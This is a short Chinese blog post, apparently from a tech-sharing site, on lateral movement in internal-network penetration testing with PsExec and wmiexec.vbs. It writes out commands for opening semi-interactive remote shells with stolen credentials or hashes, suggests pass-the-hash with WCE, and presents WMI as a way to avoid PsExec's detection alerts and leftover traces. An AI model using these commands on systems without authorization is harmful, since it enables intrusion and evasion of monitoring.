1. 程式人生 > >psexec與wmi在內網滲透的使用

psexec與wmi在內網滲透的使用

安全 服務 alt onf 註入 admin log rip 遇到

psexec是一個很好的管理工具,在內網滲透中也被廣泛使用。

但太“出名”也往往會遭來各種麻煩。

在有安全監聽、防護的內網中使用psexec會容易觸發告警。

1.psexec用法(前提:對方要開啟admin$共享 且知道對方密碼或者hash):

psexec.exe \\遠程目標機器ip -u 賬號 -p 密碼 cmd

機器在第一次使用psexec的時候,會彈出確認提示框,為避免這個麻煩,可以加一個參數:

psexec.exe -accepteula  \\遠程目標機器ip -u 賬號 -p 密碼 cmd

註:這個獲取到的是一個半交互式的shell

當破解不出hash時可以配合wce作hash註入使用

除了上面提到的,psexec已經是被“盯”的對象外。在退出時有人也不止一次遇到服務卸載不成功,在清理痕跡也是個問題。

所以有了下面的工具。

2.wmi

技術分享

獲取一個半交互式的shell:

cscript.exe //nologo wmiexec.vbs /shell 192.168.100.1 賬號 密碼

執行單條命令:

cscript.exe //nologo wmiexec.vbs /cmd 192.168.100.1 賬號 密碼 "ipconfig"
 
同樣可以結合wce來使用

技術分享

psexec與wmi在內網滲透的使用